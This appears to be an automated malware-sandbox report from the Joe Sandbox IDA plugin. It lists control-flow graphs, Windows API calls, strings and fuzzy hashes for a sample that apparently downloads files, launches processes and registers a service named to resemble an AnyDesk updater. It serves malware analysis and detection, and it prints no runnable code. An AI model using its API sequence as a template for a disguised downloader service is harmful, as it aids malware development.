_fread_nolock 
RtlLeaveCriticalSection 23771->23772 23773 7ff6c786dacf 23772->23773 23773->23765 23774->23765 23956 7ff6c78662a0 30 API calls 23989 7ff6c78585a0 SetServiceStatus SetEvent

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ff6c7852840-7ff6c7852d7b call 7ff6c785fb30 call 7ff6c785fe90 call 7ff6c785fe20 call 7ff6c7873510 call 7ff6c785fae0 call 7ff6c785fe90 call 7ff6c785f9f0 call 7ff6c785fcd0 call 7ff6c785fbc0 GetFileAttributesW 19 7ff6c7852d7d-7ff6c7852d7f 0->19 20 7ff6c7852d85-7ff6c7852dba call 7ff6c785fe20 call 7ff6c785f530 0->20 19->20 21 7ff6c7852ef1-7ff6c7854ae8 call 7ff6c785e410 call 7ff6c785fcd0 call 7ff6c785e3b0 call 7ff6c785fcd0 call 7ff6c785e370 call 7ff6c785fcd0 call 7ff6c785e330 call 7ff6c785fcd0 call 7ff6c785e130 call 7ff6c785fcd0 call 7ff6c785e010 call 7ff6c785fcd0 call 7ff6c785dfd0 call 7ff6c785fcd0 call 7ff6c785fbc0 GetFileAttributesW 19->21 29 7ff6c7852ecf-7ff6c7852ed3 call 7ff6c785f410 20->29 30 7ff6c7852dc0-7ff6c7852eca call 7ff6c7861080 * 8 call 7ff6c785e440 call 7ff6c78620a0 * 2 call 7ff6c785f990 20->30 86 7ff6c7854aea-7ff6c7854aec 21->86 87 7ff6c7854af2-7ff6c785506f call 7ff6c785d350 call 7ff6c785fcd0 call 7ff6c785fbc0 * 2 call 7ff6c785cdf0 21->87 35 7ff6c7852ed8-7ff6c7852eec call 7ff6c785f4b0 call 7ff6c785f9d0 29->35 30->29 35->21 86->87 88 7ff6c785508e-7ff6c78550a6 call 7ff6c785fbc0 GetFileAttributesW 86->88 116 7ff6c7855074-7ff6c7855089 InternetCloseHandle call 7ff6c785fc60 87->116 94 7ff6c78550a8-7ff6c78550aa 88->94 95 7ff6c78550d3-7ff6c785512b call 7ff6c785fbc0 GetFileAttributesW 88->95 94->95 97 7ff6c78550ac-7ff6c78550cd call 7ff6c785fbc0 * 2 MoveFileW 94->97 105 7ff6c785512d-7ff6c785512f 95->105 106 7ff6c7855135-7ff6c78556f4 call 7ff6c7861e20 call 7ff6c7861070 * 7 call 7ff6c785d2c0 call 7ff6c785fcd0 call 7ff6c785fbc0 * 2 call 7ff6c785cdf0 95->106 97->95 105->106 109 7ff6c7855712 105->109 199 7ff6c78556f9-7ff6c7855710 call 7ff6c785cf30 call 7ff6c785fc60 106->199 114 7ff6c7855715-7ff6c785572d call 7ff6c785fbc0 GetFileAttributesW 109->114 121 7ff6c7855737-7ff6c7856b2c call 7ff6c7861000 * 145 call 7ff6c785df90 call 7ff6c785fcd0 call 
7ff6c785fbc0 * 2 call 7ff6c785cdf0 call 7ff6c785cf30 call 7ff6c7861030 * 17 call 7ff6c785df60 call 7ff6c785fcd0 call 7ff6c785fbc0 * 3 ShellExecuteExW 114->121 122 7ff6c785572f-7ff6c7855731 114->122 116->88 748 7ff6c7856b32-7ff6c7856d5a call 7ff6c7890050 call 7ff6c7861010 * 3 call 7ff6c7861060 * 15 call 7ff6c785cf50 call 7ff6c785df20 call 7ff6c78623b0 call 7ff6c785dbc0 call 7ff6c78623b0 call 7ff6c785df10 121->748 749 7ff6c7856d5f-7ff6c7856d8d WaitForSingleObject CloseHandle call 7ff6c785fc60 * 2 121->749 122->121 124 7ff6c7856d92-7ff6c7856e85 call 7ff6c785d200 call 7ff6c785fcd0 call 7ff6c785fbc0 lstrcmpiW 122->124 145 7ff6c7856e87-7ff6c7856e8c call 7ff6c7857a20 124->145 146 7ff6c7856e91-7ff6c78570ca GetCurrentProcessId call 7ff6c7851500 call 7ff6c7861010 * 15 call 7ff6c785d090 call 7ff6c785fcd0 call 7ff6c785fbd0 call 7ff6c785fbc0 * 3 ShellExecuteExW 124->146 158 7ff6c78578b5-7ff6c7857974 call 7ff6c785fc60 * 9 call 7ff6c785fe30 * 2 call 7ff6c78676f0 145->158 282 7ff6c785730a-7ff6c7857334 StartServiceCtrlDispatcherW 146->282 283 7ff6c78570d0-7ff6c7857305 call 7ff6c7890050 call 7ff6c7861010 * 18 call 7ff6c785cf50 call 7ff6c785d090 call 7ff6c78623b0 call 7ff6c785dbc0 call 7ff6c78623b0 call 7ff6c785df10 146->283 199->114 286 7ff6c785733a-7ff6c7857888 call 7ff6c7861050 * 53 call 7ff6c785db30 call 7ff6c785fcd0 call 7ff6c785fbc0 call 7ff6c78585f0 282->286 287 7ff6c785789b-7ff6c78578b4 call 7ff6c785fc60 * 2 282->287 283->282 567 7ff6c785788d-7ff6c785789a call 7ff6c785fc60 286->567 287->158 567->287 748->749 749->124
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Internet$Attributesstd::_$CloseHandleLockit$ErrorEventLast$ExecuteLockit::_Lockit::~_OpenReadRegisterShellSource_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskCreateCtrlCurrentDeregisterDispatcherFacet_MoveObjectProcessReportServiceSingleStartWaitWritelstrcmpi
                                                                                                      • String ID: $x'x$%x*x$&x>x$)nln$,x'x$-x?x$.x5x$0r!r$20240913$3x9x$4x<x$5x=x$:r>r$:xyx$AnyDeskUpdateService$GY!Y$H}wM$M$NYOY$Nr<r$Qx$x$enfn$h1w{$jnhn$jxWx$pH}wM$sncn$t$ux(x$vzv$$w$wnmn$xx~x$}Y>Y$}wM
                                                                                                      • API String ID: 2772502545-4267904903
                                                                                                      • Opcode ID: 2efd94f85aca355810c0006856c6f39897300c774bbc6c3a7deb07320c0a45ca
                                                                                                      • Instruction ID: 6b88355e053e5ed74370372fb01d7f7c5a93b031e65d560ed3ca4f562b990eea
                                                                                                      • Opcode Fuzzy Hash: 2efd94f85aca355810c0006856c6f39897300c774bbc6c3a7deb07320c0a45ca
                                                                                                      • Instruction Fuzzy Hash: D5935D1552A6D299E730AF71D8103FA3A61FF68B4AF404036D38DCBAA9EF3D9641C705

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 869 7ff6c788ad68-7ff6c788addb call 7ff6c788a94c 872 7ff6c788adf5-7ff6c788adff call 7ff6c788506c 869->872 873 7ff6c788addd-7ff6c788ade6 call 7ff6c7874ba4 869->873 878 7ff6c788ae01-7ff6c788ae18 call 7ff6c7874ba4 call 7ff6c7874bc4 872->878 879 7ff6c788ae1a-7ff6c788ae83 CreateFileW 872->879 880 7ff6c788ade9-7ff6c788adf0 call 7ff6c7874bc4 873->880 878->880 882 7ff6c788af00-7ff6c788af0b GetFileType 879->882 883 7ff6c788ae85-7ff6c788ae8b 879->883 891 7ff6c788b136-7ff6c788b156 880->891 886 7ff6c788af5e-7ff6c788af65 882->886 887 7ff6c788af0d-7ff6c788af48 call 7ff6c7890050 call 7ff6c7874b38 CloseHandle 882->887 889 7ff6c788aecd-7ff6c788aefb call 7ff6c7890050 call 7ff6c7874b38 883->889 890 7ff6c788ae8d-7ff6c788ae91 883->890 894 7ff6c788af67-7ff6c788af6b 886->894 895 7ff6c788af6d-7ff6c788af70 886->895 887->880 911 7ff6c788af4e-7ff6c788af59 call 7ff6c7874bc4 887->911 889->880 890->889 896 7ff6c788ae93-7ff6c788aecb CreateFileW 890->896 900 7ff6c788af76-7ff6c788afcb call 7ff6c7884f84 894->900 895->900 901 7ff6c788af72 895->901 896->882 896->889 909 7ff6c788afea-7ff6c788b01b call 7ff6c788a6cc 900->909 910 7ff6c788afcd-7ff6c788afd9 call 7ff6c788ab54 900->910 901->900 919 7ff6c788b021-7ff6c788b063 909->919 920 7ff6c788b01d-7ff6c788b01f 909->920 910->909 918 7ff6c788afdb 910->918 911->880 921 7ff6c788afdd-7ff6c788afe5 call 7ff6c787cca0 918->921 922 7ff6c788b085-7ff6c788b090 919->922 923 7ff6c788b065-7ff6c788b069 919->923 920->921 921->891 924 7ff6c788b134 922->924 925 7ff6c788b096-7ff6c788b09a 922->925 923->922 927 7ff6c788b06b-7ff6c788b080 923->927 924->891 925->924 928 7ff6c788b0a0-7ff6c788b0e5 CloseHandle CreateFileW 925->928 927->922 930 7ff6c788b0e7-7ff6c788b115 call 7ff6c7890050 call 7ff6c7874b38 call 7ff6c78851ac 928->930 931 7ff6c788b11a-7ff6c788b12f 928->931 930->931 931->924
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: 1b731941ab77a7d7e1ee044a851ff69ec3e8d83a8cd4698c13b8954ec901e107
                                                                                                      • Instruction ID: ca9865fb52dacb9599552919ab04e3b4c151828284931eaba2f2939d17222c8e
                                                                                                      • Opcode Fuzzy Hash: 1b731941ab77a7d7e1ee044a851ff69ec3e8d83a8cd4698c13b8954ec901e107
                                                                                                      • Instruction Fuzzy Hash: 26C1B136B29A4285EB50CFA5C4906AC3B61FB89BA9F015236DBAE973D4DF3CD451C300

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInternet$OpenRead$CloseCreateHandleWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 1744991900-0
                                                                                                      • Opcode ID: 362309099b881e5bbaf2cceeef3ea73f52e033be54d2f21a1e01227d0a0bf40a
                                                                                                      • Instruction ID: 8f40045829700a8253c8b93f97be265542ad41cd9199a139517c9970d130df08
                                                                                                      • Opcode Fuzzy Hash: 362309099b881e5bbaf2cceeef3ea73f52e033be54d2f21a1e01227d0a0bf40a
                                                                                                      • Instruction Fuzzy Hash: BA316E22A1968286EB608F61F81476ABB60FB89BC9F445135EF8D87B44DF3DD1058B04

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C787E999
                                                                                                        • Part of subcall function 00007FF6C7879A04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C7879A29
                                                                                                        • Part of subcall function 00007FF6C78898D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C78898FC
                                                                                                        • Part of subcall function 00007FF6C787B1D8: HeapFree.KERNEL32 ref: 00007FF6C787B1EE
                                                                                                        • Part of subcall function 00007FF6C787B1D8: GetLastError.KERNEL32 ref: 00007FF6C787B1F8
                                                                                                        • Part of subcall function 00007FF6C787EBAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C787EBEA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$ErrorFreeHeapLast
                                                                                                      • String ID: .com
                                                                                                      • API String ID: 3231943733-4200470757
                                                                                                      • Opcode ID: 08bbada558672f0a580943a46073b5b52b7eede114a9b68a0c0310e25873d46a
                                                                                                      • Instruction ID: 79f5eb0091ce5b264caf1e8f5650dd99e2ad875987caccffdbbb0137c2e470de
                                                                                                      • Opcode Fuzzy Hash: 08bbada558672f0a580943a46073b5b52b7eede114a9b68a0c0310e25873d46a
                                                                                                      • Instruction Fuzzy Hash: DE51B321B0B64345FA54AF2298512BA6F89AF54BD2F084635FF9FC77D2ED3CE4018220
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID: COMSPEC$cmd.exe
                                                                                                      • API String ID: 485612231-2256226045
                                                                                                      • Opcode ID: efe5d603d0a0f45e0f73f16ca7cd868f13a5f76262dd37f7923b94b1df907e1b
                                                                                                      • Instruction ID: 10d2643cdf8e60597de4958f4262bb4ecb966abc16fde0ddd6be3c500b260db2
                                                                                                      • Opcode Fuzzy Hash: efe5d603d0a0f45e0f73f16ca7cd868f13a5f76262dd37f7923b94b1df907e1b
                                                                                                      • Instruction Fuzzy Hash: 0A318D32F0AA4284FB10DFA194815BD3BA2AF88755B454535EF9ED7A96CE38E541C310

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2936579111-0
                                                                                                      • Opcode ID: ed5618520dbe9dbe1534286bed05f644b6f1a12cd40f6c73cd46b7563356a971
                                                                                                      • Instruction ID: c5de495cd401725e9d56151da53d26c483af704fd7e54cec3548a05ac0f57513
                                                                                                      • Opcode Fuzzy Hash: ed5618520dbe9dbe1534286bed05f644b6f1a12cd40f6c73cd46b7563356a971
                                                                                                      • Instruction Fuzzy Hash: 98619122F0AB0686FB10DF61D4442BC2FA6AB45BA5F050531EF9F97B98CE38E415C350

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Event$Source$DeregisterErrorLastRegisterReport
                                                                                                      • String ID: %s failed with %d$AnyDeskUpdateService$AnyDeskUpdateService
                                                                                                      • API String ID: 544316925-1586499718
                                                                                                      • Opcode ID: 3d5dde09e4f0c9a8635dc3b2002a576137b068c398dccda7d93cadec4662d94b
                                                                                                      • Instruction ID: 2c419c78e71541d92e221fa5c9a0bc2d7e85ebdf32d0e2beb77b3116b55a086a
                                                                                                      • Opcode Fuzzy Hash: 3d5dde09e4f0c9a8635dc3b2002a576137b068c398dccda7d93cadec4662d94b
                                                                                                      • Instruction Fuzzy Hash: FE112E32609B8286EBA48F11F8513AAB7A0FB98785F400135EBCE83B54DF7DD158CB00

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: a7b1067b1fbc3cd28f896cbb9bbc6e4726eaea15fe06cbf518c3a376f57051cb
                                                                                                      • Instruction ID: cb936ad9a98cf083be12c3e5a9323292f125f50131eaf8f3f53b5b71e5ee6c00
                                                                                                      • Opcode Fuzzy Hash: a7b1067b1fbc3cd28f896cbb9bbc6e4726eaea15fe06cbf518c3a376f57051cb
                                                                                                      • Instruction Fuzzy Hash: C991D462F1A65285F750CF6694802BD6FA8BB04B9AF554139EF8FA7684DF38D482C700

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 5bc98c1c2021317396186fcc3284e49ba9d5ca290e9d263b723d4fd8b173a28a
                                                                                                      • Instruction ID: c9e188e1dddd914bceea72ac7f33dfff9fd645cadb72de7efb8c74a6bc5eaf9a
                                                                                                      • Opcode Fuzzy Hash: 5bc98c1c2021317396186fcc3284e49ba9d5ca290e9d263b723d4fd8b173a28a
                                                                                                      • Instruction Fuzzy Hash: 57D09E10F2A70792EE586FB0699707C1A116F58757F00183CCB9FC6393EE2EA5098250

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1236291503-0
                                                                                                      • Opcode ID: bf8581e221747b1aa519da3a3fdda917876ed7866bab429396813271f759fd36
                                                                                                      • Instruction ID: 346d47d21567ee11df87f0d676df2140ee70ba585488f5e2caf9cb3a77abe49e
                                                                                                      • Opcode Fuzzy Hash: bf8581e221747b1aa519da3a3fdda917876ed7866bab429396813271f759fd36
                                                                                                      • Instruction Fuzzy Hash: F8419F21E2F10362FE00AF35A4523B91A91AF55796F444035EBCEC73D7DE2DAA44C391

                                                                                                      Control-flow Graph
                                                                                                      [Control-flow graph rendering omitted: function starting at 7ff6c787c314, basic blocks 7ff6c787c314-7ff6c787c415, calling WriteFile and the internal routines 7ff6c7868000, 7ff6c78676f0 and 7ff6c7890050]
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: b053ca310af3e7b3e959bd461da812ca189cf57c899e4e5267733b9c995ffed1
                                                                                                      • Instruction ID: 04d3c76d6ab6fffd2dc8b0dc01f4d06d2ce03a7a1ff00426a05d5c281a3810c8
                                                                                                      • Opcode Fuzzy Hash: b053ca310af3e7b3e959bd461da812ca189cf57c899e4e5267733b9c995ffed1
                                                                                                      • Instruction Fuzzy Hash: 1831E132B1AB819ADB509F25E8802A97BA4FB58785F854032EF8EC3754DF3CD516CB00

                                                                                                      Control-flow Graph
                                                                                                      [Control-flow graph rendering omitted: function starting at 7ff6c787afd4, basic blocks 7ff6c787afd4-7ff6c787b0db, calling GetStdHandle and GetFileType]
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: 5e57838b2dce20432395441fed3a29f839eb20010de2f3c076eaf79001dc18ea
                                                                                                      • Instruction ID: 5d506c672a4c669cc9739aa27a683594f983ccce9878fe32f9e82ec2fc4419ac
                                                                                                      • Opcode Fuzzy Hash: 5e57838b2dce20432395441fed3a29f839eb20010de2f3c076eaf79001dc18ea
                                                                                                      • Instruction Fuzzy Hash: BE314121A19B4681D7608F2485905796E51FB45BB6F640339EBFF873E0CF39E4A1D341
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                      • String ID:
                                                                                                      • API String ID: 3548387204-0
                                                                                                      • Opcode ID: 0b4fd6439aa5f74e8bd80266028e772a311ec34cef78dfd92916b01d919c9ec4
                                                                                                      • Instruction ID: 6c90cdf1eb3e723f2dd80aa3810c80eb7c34e82bd46163374984e4aa4bafb769
                                                                                                      • Opcode Fuzzy Hash: 0b4fd6439aa5f74e8bd80266028e772a311ec34cef78dfd92916b01d919c9ec4
